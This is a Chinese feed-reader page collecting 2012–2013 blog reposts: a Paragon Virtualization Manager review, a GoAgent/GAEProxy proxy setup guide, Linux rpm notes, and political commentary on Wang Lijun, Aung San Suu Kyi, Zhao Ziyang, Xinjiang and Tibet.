Normal view

There are new articles available, click to refresh the page.
Before yesterday冲出重围

Paragon Virtualization Manager - 圈养你所钟爱的旧版Windows

By: Onlyone
26 February 2013 at 23:08

Paragon Virtualization Manager - 圈养你所钟爱的旧版Windows  NEW

忆往昔,Windows 7 是在2009年10月22日我的初中单相思的生日那天正式发布的(当然RTM更早一些,8月的样子吧),所以刻骨铭心。。。的确,用了多年的MSDN原版 Windows XP,就和暗恋了多年的女孩一样,是那样亲切,那样温馨,那样有爱,那样美好,那样不舍……
现在,她结婚了,XP也被中止了主流支持。是时候来一些改变了!
Paragon Virtualization Manager
但是,同她的回忆可以封存,而它的数据却要迁移到新环境中继续发光发热,这可是一件麻烦事。重装软件、导出导入,折腾不说,有些软件,在 Windows 7 下,是无论怎样设置应用程序兼容模式都无法正确运行的。
这时,Paragon Virtualization Manager 出现了……
Paragon Virtualization Manager
首先在各位砖家读者面前班门弄斧一下,做几个有关虚拟化的名词解释。之前有通过软件如ThinAppCameyoThinstall等实现软件虚拟化,以便制作便携软件,而 Paragon Virtualization Manager 是一种操作系统虚拟化技术应用,系统虚拟化是一种软件技术,它能够让一台计算机同时运行多个虚拟系统,并且能够进行系统间的资源交换。P2V(Physical-to-Virtual) 是系统虚拟化技术的一部分,使用这项技术,用户可以将实体机(当前的物理系统)迁移到虚拟机(虚拟环境)中。虚拟磁盘是保存在物理磁盘驱动器上面的一个系统虚拟机映像文件。
Paragon Virtualization Manager
了解过上述概念,你就应该知道我想做什么了。没错,就是将当前的物理系统 Windows XP,迁移到虚拟机中圈养起来,然后在新安装的 Windows 7 下面运行。这可不是文件复制粘贴做镜像那么简单。Paragon Virtualization Manager 将物理系统虚拟化的完整技术原理如上图所示。
表被这些术语给吓到,实际操作起来也就只需简单几步,在 Paragon Virtualization Manager 主界面选择 P2V Copy,然后跟着向导走完就好。
Paragon Virtualization Manager
Paragon Virtualization Manager 支持将当前系统转换为 VMware Workstation、Virtual PC 或 VirtualBox 的虚拟镜像格式,虚拟磁盘镜像生成后,就可以被导入相应的虚拟机软件中了。当然你可以使用 StarWind Converter 来相互转换 VMWare(VMDK) 和 Virtual PC(VHD) 镜像格式的镜像格式。
既然你是玩得起虚拟机的Geek,应该也不怕多折腾这一小会儿吧?其实 Paragon 的产品远不止这么强大,有兴趣求专业版的盆友们,欢迎 follow 我 @f1098~

Paragon Virtualization Manager 下载信息

官方网站:www.paragon-software.com
解压密码:www.portablesoft.org
压缩包MD5:895C8553490D6D236DB2CCE2575BBFFC
开始下载 Paragon Virtualization Manager 12 Compact 绿色免费版
ParagonVirtualizationManager_12_PortableSoft.rar | 20.2 MB
来自精品绿色便携软件  |  进入软件下载页面
Loading

Loading
统计信息
文章热度:5,799次浏览 ~ 最后更新:2012/04/20 14:39
本文作者
作者:Yadon
简介:千言万语,汇聚成一个字:喵!!~
看看Ta的专栏文章  |  Ta的微博
相关软件
软件标签
       •  •  •  •  •  •  •
多说一点
社交帐号登录:

GoAgent 部署

By: Onlyone
13 April 2012 at 17:00
1). 服务器端部署:


 下载最新版本GoAgent 

最近更新

  • [0412 是]1.8.1稳定版发布。1.优化pac文件 2.兼容youku视频/qq电台/douban电台
  • [0405 是]1.8.0稳定版发布。主要包含以下改进:
  1. golang版本复活。
  2. SSL证书优化
  3. 为mobile端提供pac文件
  4. 客户端性能优化
  5. 客户端和服务端的bug修复
  6. fetch.php支持大多数PaaS平台
  7. 更友好的uploader程序

简易教程

  • 如何部署和使用goagent,以Windows为例
  1. 申请Google Appengine并创建appid。
  2. 下载goagent稳定版 http://code.google.com/p/goagent/
  3. 修改local\proxy.ini中的[gae]下的appid=你的appid(多appid请用|隔开)
  4. 双击server\uploader.bat(Mac/Linux上传方法请见FAQ),上传成功后即可使用了(地址127.0.0.1:8087)
  5. chrome请安装SwitchySharp插件,然后导入这个设置http://goagent.googlecode.com/files/SwitchyOptions.bak
  6. firefox请安装AutoProxy,Firefox需要导入证书,方法请见FAQ

2) Android GAE Proxy安装:

GAE Proxy for Android

WallProxy | GoAgent Android 客户端,综合 RedSocks、CMWRAP、SSHTunnel 和 Python For Android 等项目,以实现 Android 系统上基于 Google AppEngine 的 HTTP 代理。
AFTER UPDATING TO 0.16.0, PLEASE REINSTALL DEPENDENT MODULE, OR JUST REINSTALL THE WHOLE APP
升级到 0.16.0 版本后,请重新安装依赖模块,或直接卸载后重装整个应用

问题反馈:@gaeproxy

快速指南

  • 【可选】导入 GAEProxy 根证书,详细请见 教程
  • 下载并安装 GAEProxy 最新版。
  • 第一次运行 GAEProxy 请按照提示进行设置,然后在联网的状态下勾选 “安装依赖模块” 。依赖包大小 5MB,建议在 WIFI 状态下下载,安装文件默认存放于 SD 卡或外置存储器中。
  • 现阶段 GAEProxy 的运行依赖于 iptables ,并需要获得 ROOT 权限。
  • 建议不要开启“全局代理”,最新版的 GAEProxy 支持“为应用分别设置代理”功能,去掉“全局代理”选项,再点击此选项,之后就可以选择你需要使用代理的应用了。
  • 勾选 “开启服务”,浏览互联网。

FAQ

1. 是否一定需要 ROOT 权限?
一定需要。由于 Android 系统本身并没有提供完善的代理实现,所以必须借助于 iptables 这个模块来实现流量代理与转发,而运行 iptables 需要 ROOT 权限。
2. 是否一定需要 iptables 模块?
一定需要。理由同上。
3. 如何确认自己的 ROM 支持 iptables?
一般来说,只要系统原生支持 tether 的都支持 iptables。手动确认的方法是在 adb 下,执行 “iptables –L –t nat”,若没有提示找不到 module 则可以确认为支持 iptables。
4. 是否 ROM 中包含名为 iptables 的执行文件,即可以认为是支持 “iptables”?
准确的来说,应该是需要 ROM 的 kernel 中编译进了 Netfilter / NAT 模块,并至少支持 DNAT 和 REDIRECT 两种转发模式中的一种。至于一些个人开发者的第三方 ROM,由于其水平有限或缺少相关的技术支持,会缺少对 iptables 的支持,即使他们提供了 iptables 的二进制文件。
5. 为什么会无法访问一些 https 网站?
受到 DNS 污染的影响,老版本中会存在无法访问某些 https 网站的问题。没有 ROOT 权限或 iptables 支持的用户,若自行在浏览器中设置代理,也会遇到这种情况。
6. 为什么无法访问 Twitter ?
请启用“https 代理”选项,之后可以选择使用 https 链接访问 Twitter 移动页面,或直接使用 Twitter 客户端(推荐:twicca, tweetdeck, 以及官方客户端)。
7. 升级到新版本后,为什么会无法使用?
每次版本更新后,由于测试不充分等原因,确实有可能引入一些 Bug。遇到类似情况,请前往项目网站下载老版程序重新安装,以确认遇到的问题是否是由更新造成。另外,建议每次大版本号更新时,请卸载之前版本再重新安装。
8. 用泰坦备份或其他备份工具恢复 App 后为什么无法使用?
请不要使用备份工具,备份和恢复 GAEProxy,因为会破坏数据区的执行文件和权限,造成 App 无法正常运行。
9. 为什么开启代理之后依然无法 ping 通一些网站?
由于我们并没有转发 UDP 流量,因此也不会转发 ICMP 数据包。在无法直接连通的情况下,自然也无法正常 ping 到对方服务器。然而,无法 ping 通服务器并不代表无法与其通信。
10. 为什么会有广告,如何去掉?
GAEProxy 中有置顶广告,收入会投入到 App 的再开发及相关服务器的部署(如 DNS 代理)。若实在觉得广告碍眼,可以从源代码自行编译没有广告的版本或利用 hosts 工具全局屏蔽广告。
11. 如何获得源代码?
GAEProxy 是一个开源项目,且依照 GPLv3 发布源代码,源代码及文档见项目网站。
12. 如何参与到项目中来?
参与到项目的方法包括:提交 Bug Report 或者改进建议;直接提交 patch。对于后者,我们会在第一时间做出反馈,并将修改合并到主分支中。
13. 是否可以修改源代码后另行发布?
可以,只要修改后的项目也依照 GPLv3 发布即可。
14. 是否可以捐助项目?
本项目不支持任何形式的捐赠,但欢迎各位参与到项目中(提交 issue 等)来帮助我们开发出更好的 App。
15. 项目中都用到了哪些开源组件?
redsocks:与 iptables 配合实现转发功能。
dnsproxy:cmwrap的子项目,用来代理 DNS 流量。
proxylist: TorProject 中的代码,以实现分应用代理。
iptables: DroidWall 项目提供的二进制文件。
GAppProxy: GAppProxy 客户端代码。
WallProxy: WallProxy 客户端代码。
GoAgent: GoAgent 客户端代码。
Python4Android:用来在 Android 系统中执行 Python 脚本的运行时环境,以依赖包形式发布。
另外还有一些发布在 StackOverflow 上的代码片段,在这里不再详细介绍。

电子市场

雾锁重庆:演员王立军

By: Onlyone
4 March 2012 at 10:55

这名夙昔在媒体眼里叱咤风云的打黑英雄与警队铁汉,在公众视线里留下的最后一次背影,居然是初春暮色里,成都街头上,一位华姿绰约的美妇人。 /韩剪溪
综合各方信息源,王立军夜奔成都美领馆的事实基本面已经没有疑问。现在等待进一步求解的,无外是这些基本面要素之外的若干细节:他夜奔领馆的原因和动机是什么?他在里面究竟干了些什么?以及出入领馆前后的若干技术环节等等。
比这些更让人觉得扑朔迷离的,是王立军这个人的真实形象与性格。
他一举推翻了此前所有曾经演出过的角色,真不愧是演员王立军。
他是一名从业28年的资深警察,一个媒体包装与坊间流传的打黑英雄,是一名不扛军衔的军人,一个道上威风八面的大哥,一个兼职无数、光环不尽的学者,一名在尽忠事主与反噬恩主之间辗转腾挪的职场二人转主角。
说到底,他是一名演员。
在职业经历上,王立军在出演一个永不退伍的军人。
1978年去00419部队当兵开始,到1984年进入警队,到任职铁岭、锦州和重庆期间,多次兼任当地武警部队政委,再到201222日交枪「扒皮」,53岁的王立军扮演的主要社会身份,与其说是一名警察,不如说是一名军人。
军队作风与军人作派,无外是讲究雷厉风行,说一不二,绝对服从命令。这些军派行事风格,本就与警队作风类似,放在王立军身上,更是高度重合,贯穿在打黑、办案、治警等诸多事项上,闪现在项目组、铁山坪、火箭筒、武警专列等诸多关键词上。
实际上一直到201222日以前,他从未退伍。
在内心深处,王立军在出演一个黑白两道都风光无限的大哥。
他好大排场,喜大制作,善整大场面。抓文强时,他率数百警员包围飞机,列队示威;抓李庄时,他再率数百警员包围飞机,列队示威;缉枪治爆时,他率上千警员,包旅游专列,携火箭筒,搞兵团作战;他要求警队不着制式警服时就穿西服革履,甚至自己设计制造女式风衣等各色警用装备。
他就像警察队伍里的张艺谋,酷爱画面,酷爱色彩,对整齐划一的形式感有难以自制的洁癖。即便做到导演级的大哥了,还是时不时会忍不住亲自下场亮一手摄像的活。
在变幻莫测的仕途上,王立军是分饰忠仆与叛徒这个双重角色的二人转主角。
在辽宁,他和原铁岭司法局局长王海洲之间的关系,已是众所周知的往日恩怨。在重庆,他和市委书记之间又重拾旧情,在知遇之恩与反噬之恨之间摸爬滚打。饰忠仆事主时,可以三年之内连升两级,从副厅级跃居副省级,恩遇之隆,权势之重,世所罕见。唱红打黑高潮之际,举目所见,山城上下,唯见此主仆二人。饰叛徒夜奔时,又决绝如斯,周密如斯,七十辆警车唤不回,万千围困,我自逍遥北上。
大陆政界乃丛林世界,仕途从来都是风光与凶险并存,甫志高所在皆有,江姐世所罕见。但像王立军这种在短时期内就屡屡急剧转换角色的二人转演员,实属罕见。
最能体现他的表演欲与炉火纯青的表演才华的,还是在镁光灯前与摄像机下。
他善用台词,言词简练却含义丰富,远胜真正的编剧。
刚在铁岭出道时,他说「有些黑社会头子扬言要拿500万买我的头!」这种技法还稍显稚嫩,和大陆一些所谓掘黑记者自我包装的办法类似甚至雷同。
到中后期则愈发成熟。重庆打黑初期,他说:「我希望听到枪声……」,让人遐想无限,顿起月黑风高哥舒带刀之豪情胜慨;抓捕警队高官时,他说「打什么黑?比黑社会还黑!」整肃警队的铁腕作风,嫉恶如仇的正气形象,跃然纸上。
他也是肢体语言的高手。在媒体上呈现的经典形象,是三类:
在出道初期,辽宁当地媒体拍摄的一些照片上,他喜欢斜站在吉普车上,一手持枪,一手持步话机,昂首向天。这主要是受港片和西部片的影响,有一点桀骜不驯的绿林色彩。大陆一位女律师从女性的角度对他的描述很准确:「他在报道中的定位是那种孤胆英雄形象,晚上开着改装的四大灯吉普,估计肯定穿黑风衣高筒靴子,回家喜欢有人开着灯在等他,睡觉不关灯,估计也是和衣而眠……
稍晚一点,即是着制式警服,胸前挂满各类勋章,背后是各类题字。这类定妆照,已经纳入了体制框架之内,再揉进了一些文化元素。
伴随着官越做越大,再晚一点的形象,是在镁光灯下,脱帽半低头,这是沉静而谦逊地谢幕。这是学者型官僚的装扮,儒雅的斯文气质已经在慢慢覆盖掉了喊打喊杀的江湖味道。上述女律师对此的读解是:「我理解为他在等待掌声响起。这是他最经典的从政心理,他一直在等待黑暗里掌声响起,在灯下谢幕……
王立军最后出现在媒体镜头前的,是在25日重庆卫视新闻里。王视察当地高校,身着黑色风衣,双手始终插在风衣口袋里,面无表情。这个可堪玩味的画面,隐约又让人闻到了几份血雨腥风的江湖味道。
坊间流传的一个细节是,26日晚,王立军驱车自渝赴蓉时,身着女装头戴假发,是化妆之后悄然潜入美领馆的。如果此点最终得以证实,那么这名夙昔在媒体眼里叱咤风云的打黑英雄与警队铁汉,在公众视线里留下的最后一次背影,居然是初春暮色里,成都街头上,一位华姿绰约的美妇人。
坊间有句云:出了山海关,都是赵本山。王立军和赵本山一样,都是辽宁人,都起家于东北「大城市」铁岭,也都擅演戏,是天生的演员。在戏路上,既有地域「忽悠」文化浸淫的基因,也有各自的天分传承。

昂山素季:一个温婉而执着的女人

By: Onlyone
4 March 2012 at 00:49

昂山素季:一个温婉而执着的女人

by grass mud horse
作者:兰草 | 评论(3) | 标签:昂山素季家国情怀非暴力理念
1988年,乍暖还寒的三月,母亲病危,昂山素季回到了祖国缅甸。
身为牛津大学教授的丈夫和她的两个儿子留在了英格兰。
昂山素季与阿里斯的爱情和婚姻,建在家国情怀之上。恋爱时,素季在给阿里斯的信中曾写道:“我只有一个请求,如果国家和人民需要我,恳请帮助我让我为他们尽职”。当时,幸福中的阿里斯心里清楚,有一天命运会让索季在家与国之间作出艰难抉择。他承诺,“我永远不会站在你和你的国家之间。”
虽有理性的情感铺垫,20多年前,当这道重大的家国选择题真的出现在昂山素季面前时,她还是进入了十分痛苦的两难境地,阿里斯面对妻子的选国离家,兑现了他的承诺,体验了爱人分别的万般无奈。
曹雪芹在太幻虚境里虚设了一个人物,她的名字叫兼美,且不把兼美看成可卿的乳名,而理解成只有虚幻中才能出现的两全其美,如此说着,是否可以淡定地接受现实生活中有关美好的缺撼呢?
诚然,我们不曾想要把家国情怀分开过。
只是,人世间太多的事情不以人们意志去转移。
患难真情,舍身忘己,见义勇为……
人类心灵中有些东西是非常崇高的,它一直蛰伏在某个地方,只要一个契机将其点燃,迸发的是便是灿烂的生命火花。
一个温婉而执着的女人,毫不畏惧地把她最高报负给了她的国家。
身形纤秀、内心强大的昂山素季,生命里流淌着争取民族自由的热情,赋予政治以道德的内涵,有着对政治独特的感悟和广阔的心灵。20多年来,面对极权、暴力、软禁、言论控制, 昂山素季以她不变的从容,非暴力地,不懈地抗争,让缅甸军政府不寒而栗并视之为最大敌人。岁月在她的脸上刻下了道道皱纹,却无法削弱她的政治意志。
政治不是我的兴趣,跟我也扯不上关系,似乎我也没有为人类解放奋斗终生的信念。尽管如此,当昂山素季平和地、隔着山水,隔着国度,为我打开一个政治空间时,我内心的某种意念还是被激活了,这样的政治空间没有理由不加入啊! 因为它的愿望是为国家、为人民争取更好的生活。
柴静说,湖南大学有个女孩给她写过一封信,说有一天自己去打水,边走边听她的节目,发现平时一个特别讨厌的女孩也在听,那一瞬,她忽然理解:原来每个人都有相似的部分。
无论西方东方,不管是否相识,还是有着不同地位和身份,我们都愿意为世界各国美好的明天集合在昂山素季非暴力抗争的政治空间里。
昂山素季的非暴力理念和甘地、曼德拉、哈维尔是一脉相承的。
甘地非暴力的政治与哲学思想,早在青春年少的素季生命中就埋下伏笔,那时,她在印度新德里学习,之后成长中的素季在她生命行文中,一直有着彼此照应。
在那些被软禁的日子里,想象着昂山素季会常常“穿越”时空,会见到圣雄甘地,“当我绝望时,我会想起,在历史上只有真理和爱能得胜。历史上有很多暴君和凶手,在短期内或许是所向无敌的,但是终究总是会失败,永远都是这样……。”
不过,政治的残酷和不择手段,往往让人们唯恐避之不及。
值得庆幸的是,昂山素季回国后的20多年,没有遭遇“纳粹”、“党卫军”和“奥斯维辛”这类非人性的法西斯,如是,她或许早已不明不白地死去了。这是归于极权主义对残酷程度的收敛,还是人类历史的进步抑或政治敌人内心道德的提醒?
1991年,诺奖委员会主席在昂山素季被授予诺贝尔和平奖的致辞中说:“暴力是它自己最难缠的敌人,不惧则是和它对抗最厉害的武器。为什么昂山素季能像甘地和她父亲一样成为人人折服的象征?她那令人感动的勇气是一个重要因素。”
不惧,令人感动的勇气!
那天,和王迪,一个只身来上海寻梦的80后女孩,在一茶一座,聊起喜欢的柴静。
自从听过柴静的演讲“认识的人,了解的事”,那平实的人事带来的感动,存于心。温家宝的“中国大地上的事情是无穷无尽的,不要在乎一城一池的得失,要执着”这句话是长者、智者给予的教诲,很多人在感悟后受益。
执着,才是我们应该在乎的。
今天,我们被昂山素季打动的不正是她执着的勇气和执着的信念吗!
然而,作为妻子和母亲的她是不是太过于坚强了?是她用优雅的举止来掩盖她的思念和悲苦,从而不让“亲者痛、仇者快”吗?还是“舍不得孩子套不到狼”的俗语指导了她的行为?
我的胡思乱想不着边际,我所站的这个位置,只能够仰视她。
她的家族背景、教育背景、学识文化,个人修养在她的国度成为民主领袖是理所当然的,而最近一部以她为原型的传记电影《昂山素季》在世界公映,她被推上全球偶像的高度也是众望所归的。
读过艾略特的小说《米德尔马契》,小说描述了多萝西娅灾难性的婚姻和她理想的破灭,以及医生利德盖特失败的婚姻和事业,通过细节和心理描写,表达出人物一系列悲剧都是由社会造成这一主题。
昂山素季对采访她的一位记者谈起了这部小说,她说,“利德盖特对妻子感到失望,担心自己无法再好好爱她。我当时还很困惑,难道他不更应该担心妻子不爱他才是吗?……后来我理解了他,如果他不再爱自己的妻子,他就被生活打败了。”
每一位认真的读者都会伴随着自己的思想感情去读一部作品。
昂山素季,她的境界、她的“非暴力”、她的爱也体现在她的读书心得里。
1995年,昂山素季的丈夫和孩子来到仰光和她有过一次短暂的见面,这是他们最后一次相聚。
作为女人最大的遗憾,昂山素季认为没能和她的两个儿子亲密地生活在一起。
1999年,阿里斯被检查出癌症晚期,阿里斯有请求来缅甸,没有获准。或许缅甸当政希望素季自己提出去英国,正好可以驱走这个麻烦的女人,只是素季不想让敌人目的得呈。
在阿里斯最后的日子里,夫妻俩只能在电话里倾诉思念,即使电话一再被人掐断,他们也保持断续的通话。温暖彼此,传递爱的心声。
写到这,我已经认识到,当初昂山索季“选择国家”只是选择了一种形式,她从没有放弃过她的小家情怀。山高水远,阻隔不了他们夫妇间的情深意长;软禁控制,禁控不了亲情融融的精神家园。与通常女人一样,昂山索季心底最温柔的一处属于她的爱人和孩子。
当昂山素季意识到此生再也无法与阿里斯相见时,有一天,她穿上了阿里斯最喜爱颜色的衣服,头上戴着玫瑰花,去了英国使馆。在那里她录制了一段与丈夫告别的视频,她说,“阿里斯,你对我的爱是我坚持下去的动力……”。
我确信,内心强大者的背后一定有爱在支撑。
这段视频后来被偷偷带到牛津时,阿里斯已经离开人世二天了,他没有看到昂山素季的视频,但他在天堂一定有妻子的爱相伴。
一个集家国情怀于心的女人,在多年被软禁的日子里,昂山索季的生活非常规律。晨起,冥想禅修,听广播,弹钢琴,做家务,下午用来读书。也当她面壁十几年后的破壁了,她以慈悲的情怀、坚定的目光,再次来到民众中间,更加努力地为实现国家的民主、人民的自由而奔走。

Linux 学习笔记(2) Terminal 下软件安装

By: Onlyone
4 March 2012 at 00:43

Using the rpm command
The command used to work with RPM package files is rpm. To manage RPM packages, the rpm command has options that let you list all the packages that are installed, upgrade existing packages to newer versions, and query packages for information (such as the files or documentation included with the package). There is also a verify option to check that all files that make up the package are present and unchanged.

The rpm command has the following modes of operation:

• install (-i)
• upgrade (-U)
• freshen (-F)
• query (-q)
• verify (-V)
• signature check (--checksig)
• uninstall (-e)
• rebuild database (--rebuilddb)
• fix permissions (--setperms)
• set owners/groups (--setugids)
• show RC (--showrc)







Querying packages with rpm
You can use the query options (-q) of rpm to get information about RPM packages. This can
be simply listing the packages that are installed or printing detailed information about a
package. Here is the basic format of an rpm query command (at least one option is required):


# rpm -q [options]


The following list shows some useful options you can use with an rpm query:
• -qa — Lists all installed packages.
• -qf file — Lists the package that owns file. (The file must include the full path name or
rpm assumes the current directory.)
• -qi package — Lists lots of information about a package.000
• -qR package — Lists components (such as libraries and commands) that package
depends on.
• -ql package — Lists all the files contained in package.
• -qd package — Lists all documentation files that come in package.
• -qc package — Lists all configuration files that come in package.
• -qp [option] package — Query packages that are not yet installed. Using this option,
along with other query options, allows you to query packages you have that are not yet
installed.
To list all the packages installed on your computer, use the -a query option. Because this is a
long list, you should either pipe the output to less or, possibly, use grep to find the package
you want. The following command line displays a list of all installed RPM packages, and then
shows only those names that include the string of characters xfree. (The -i option to grep
says to ignore case.)

世界媒体看中国:突然的新疆

By: Onlyone
3 March 2012 at 23:51

少数民族聚居的新疆在过去的几年里成了中国特别多事的地方。仅在去年7月,就发生过至少三次有人员死伤的暴力冲突。2月29日星期三,官方的新疆天山网又发布一条怪异而惊人的消息:

“2月28日18时许,在新疆叶城县县城幸福路步行街,9名暴力恐怖分子突然冲向人群,持刀砍杀无辜群众,造成13名无辜群众遇害,多人受伤。当地公安干警迅速出警,果断处置,当场击毙7名暴力恐怖分子,抓获2名。目前,善后救治和案件侦查工作正在进行中。”

*神秘莫测的“突然”*

中国官方这条新闻的一个最重要的关键词是“突然”。跟官方过去有关新疆暴力冲突的消息一样,官方的消息给读者的印象是,暴力恐怖分子像晴空霹雳一般突然出现,事先没有任何征兆或由头,事后也让人无从捉摸。

与此同时,中国当局也采取了及时而有力的措施,对有关消息实行全方位的封锁,限制而不是帮助人们获取相关信息,从而确保人们难以了解新疆南部喀什附近的叶城到底发生了什么事情。

在新疆出现最新的导致多人死亡的消息传出的当天,也就是2月28日星期二,英国主要报纸《卫报》记者玛丽·亨诺克从北京发出报道说:

“(中国)网络监管当局开始屏蔽互联网叶城和喀什的搜索结果。用户在新浪微博搜索有关的消息,会被告知根据相关法律法规和政策,有关搜索结果未予显示。微博用户在过去常常会迅速传播有关灾难、事故和其他政治上敏感的事件的目击者陈述。”

法新社星期三的报道则说:

“跟在中国经常发生的一样,到了出现敏感事情的时候,信息封锁机制就启动起来。星期三,人们在中国主要的微博网站新浪微博搜索‘新疆叶城’,搜索结果被屏蔽。”

*真相晦暗难明*

星期三在报道新疆官方的天山网有关消息的时候,路透社记者白宾(Ben Blanchard)和储百亮(Chris Buckley)也在他们的新闻报道中指出,官方的消息包含着一系列的谜语:

“新疆地方政府没有说明那些攻击者当中的任何人的身份,也没有指出他们的族裔。官方消息也没有指出受害者的族裔。”

日本广播协会NHK星期三的报道,也指出了官方消息的这一问题:“(中国官方消息)没有说明(在新疆喀什叶城县)武装团伙以及死者的民族、犯罪行为动机。”

美联社星期三的报道说,过去几年来新疆多次发生暴力冲突;“中国当局表示,这些事件都是有组织的暴力袭击。但海外的维吾尔族团体则表示,那些冲突事件是愤怒的人进行的反政府暴乱。维吾尔族活动家和安全分析家们认为,这些暴力冲突起因于维吾尔族在经济上被边缘化,维吾尔族文化和穆斯林宗教受到限制,导致维吾尔族年轻人感到压抑和愤怒。中国当局声言有外部势力卷入,但没有提出多少证据。中国当局也很少提供逮捕和惩罚犯罪嫌疑人的详情。新疆在北京以西3500公里。信息严密封锁,加上地处偏远,使那里发生的类似事件的来龙去脉常常是晦暗难明。”

*官方说法令人起疑*

中国当局已经将新疆最新出现的暴力冲突事件定性为恐怖分子袭击。对此,总部设在美国首都华盛顿的在美维吾尔族协会主席阿里木·赛多夫发表声明说:

“中国对东突厥斯坦(新疆)所发生的动乱明显缺乏透明性,使人们不得不深刻怀疑中国官方的说法。在缺乏令人信服的证据的情况下,国际观察家在听到中国当局说‘暴乱分子’和‘恐怖分子’的时候应当十分小心。新疆实行的严酷保安措施以及警察重兵防守,在那里形成了一种恐怖的气氛,没有人敢说真话。中国政府显然无意公开它的维吾尔族政策所造成的后果,因此就对那一地区的信息实行垄断封锁。”

*中国外交部说法*

中国外交部发言人星期三在例行记者会上,就新疆最新发生的暴力冲突发表评论说:

“暴力恐怖分子对无辜群众大下黑手,残杀数名群众,令人发指。”

“新疆广大群众坚决反对一小撮暴力恐怖分子和分裂主义人员,破坏和平发展和安定团结的局面,会对黑手倍加警惕,不让行动破坏新疆发展大局。”

软禁中的赵紫阳:姚监复谈见赵内幕

By: Onlyone
3 March 2012 at 23:31

软禁中的赵紫阳:姚监复谈见赵内幕

by 未可
中国著名公共知识分子,前中国国务院农村发展研究中心研究员姚监复最近来美国访问。他是六四事件中被罢黜的中共总书记赵紫阳被囚禁期间见到赵紫阳的极少数人之一。他日前在美国之音总部接受了记者未可的采访,谈到了见到赵紫阳的经历和细节。这段当事人细说的中共党史,具有极重要的史料价值。美国之音将陆续播出有关视频。

未可:姚监复先生,非常高兴你能够来美国之音做客。今天想让你谈谈赵紫阳这个人。我们都知道,赵紫阳在1989年在政治上被清洗之后,在北京独居16年时间。你是少数几个当年能够接触到他的人。赵紫阳基本上与大众隔绝。请您谈一谈你自己所认识的赵紫阳,赵紫阳是一个怎么样的人。首先请您谈谈你是怎么样认识赵紫阳的?
<!--AV-->
姚监复:主持人和听众观众们,非常感谢感谢美国之音给我一个机会,让我介绍在赵紫阳的最后年代我和他见面的一些印象。我是2004年3月和5月,去找赵紫阳家。我是和宗凤鸣先生一起去的。宗凤鸣是北京航空航天大学的党委副书记。赵紫阳的同乡和战友。他在赵紫阳晚年期间,去过赵紫阳家一百次。回来后他通过追记,写了一本书,《赵紫阳软禁中的一百次谈话》。 这一百次谈话中,有两次,也就是2004年3月一次和5月一次,是赵紫阳约见姚监复,(谈话稿)是我整理的。

未可:当时赵紫阳约见你是什么原因?

姚监复:一个原因是,宗凤鸣85岁了,他觉得他记录赵紫阳的讲话有些困难。所以找一个稍微年轻一些的人帮他记录。以什么原因和什么理由去见赵紫阳,和赵紫阳能够接受他原来没见过的人,能够到赵紫阳家里去,就考虑到我。我是中共中央农村政策研究室的研究员,84年我曾经在玉泉山参加过赵紫阳75计划报告的起草工作。赵紫阳他不愿意见他原来不认识的人。宗凤鸣就说,这个人是你原来用过的人,是帮助你起草文件的秘书班子里面呆过的人。还有一个理由是,我来过几次美国,见过美国各方面的人士,他也想了解原来的部下在美国的情况,以及以后出来的人的情况。他让我准备一下对美国的民运人士,教授们以及各方面人士的看法,理由就是谈谈美国的见闻。至于进富强胡同的身份,因为门口有警卫,我当时也是以气功师的身份,宗凤鸣的身份既(和赵紫阳)是老乡,又是气功师,我也是以小气功师的身份进去的。

未可:你进富强胡同,事先有没有经过批准?

姚监复:事先没有经过批准,也没有申请。但是进门的时候,查了我的证件,而且进门的时候,解放军值勤的人把我的证件留在了门口,第一道大门后面的警卫室,出来的时候才给我。事先宗凤鸣和赵紫阳联系了,说几点钟来,这样的话,进门的警卫他们有什么手续批准我进去的,我不知道。他们认识宗凤鸣。所以在敲门的时候,胡同里面的便衣巡逻非常严厉地厉声呼道:“干什么的!”后来大门打开,解放军给胡同里面的便衣说,他们联系好了,就让我们进去了。看来,在外面的警卫,另外有一套警卫班子,管这个你不能随便敲(赵紫阳的)门。进去的时候,他们一看证件,事先联系好了,就让我们进去了。

未可:你能不能描述一下,富强胡同这个院落的情况?

姚监复:那是一个四合院,第一个院落是解放军警卫排住的。然后再往右边走,过一个门,进去的话,是赵紫阳的书房,对面是他们的卧室。这边是食堂和饭厅。我们在第一个门进去以后,赵紫阳在他的书房门口接待了我们。他有一条小狗,会汪汪叫,所以解放军就说,等一下,让他们家把小狗看好。赵紫阳当时有一些孤独,养了狗。

(赵紫阳在和姚监复谈话的时候,非常关心六四之后流亡到美国的一些老部下的情况。精彩内容,美国之音将在以后的节目里陆续继续介绍。)

西藏要求现阶段维稳压倒一切 严管网络与手机

By: Onlyone
3 March 2012 at 23:29

西藏要求现阶段维稳压倒一切 严管网络与手机

from 翻墙大杂烩 by None
来源:西藏日报

本报2月29日讯 今天,自治区党委书记陈全国就做好近期维护稳定工作作出批示。他要求,要坚持抓早抓小抓快抓好,进一步把维护稳定的各项工作做深、做细、做实、做好,为全国两会胜利召开营造良好氛围。

陈全国在批示中指出,今年以来,全区各级党委、政府特别是各级维稳工作班子、政法机关、驻藏人民解放军、武警和公安现役部队,认真贯彻落实胡锦涛总书记“七一”重要讲话和关于西藏工作的一系列重要指示精神,贯彻落实中央第五次西藏工作座谈会和习近平副主席出席西藏和平解放60周年庆祝活动时的一系列重要讲话精神,围绕以胡锦涛同志为总书记的党中央明确的“一个中心”、“两件大事”、“四个确保”,全面落实自治区党委、政府关于维护稳定的各项举措,坚持抓早抓小抓快抓好,周密安排、精心部署,履职尽责、全力以赴,实现了大事不出、中事不出、小事也不出。全区广大党员干部特别是政法维稳干警、执勤部队官兵,牺牲节假日、放弃短期轮休,连续作战、坚守岗位,全身心投入维稳工作,充分体现了特别能吃苦、特别能战斗、特点能忍耐、特别能团结、特别能奉献的“老西藏”精神,为保持全区社会和谐稳定作出了突出贡献。自治区党委、政府,向全区各级各部门和广大党员干部表示衷心的感谢!向坚守在维稳一线的各级维稳班子、维稳指挥部成员、广大政法干警、驻藏部队指战员、武警和公安现役部队官兵,表示衷心的感谢、并致以崇高的敬意!希望大家珍惜成绩、再接再厉,以对党和人民高度负责的精神,进一步把维护稳定的各项工作做深、做细、做实、做好,巩固发展西藏和谐稳定的好局面。

一是维稳警觉要提高、再提高。充分认识当前维稳工作面临的严峻形势,切实做到高度重视、警钟长鸣,未雨绸缪、防范在前,进一步强化稳定压倒一切的思想、时刻绷紧稳定这根弦,进一步增强责任感、紧迫感和危机感,坚决克服松懈麻痹思想,全力做好当前维稳防控工作,彻底粉碎敌对势力、达赖集团破坏西藏稳定、危害国家安全的图谋,为全国两会胜利召开营造良好氛围。

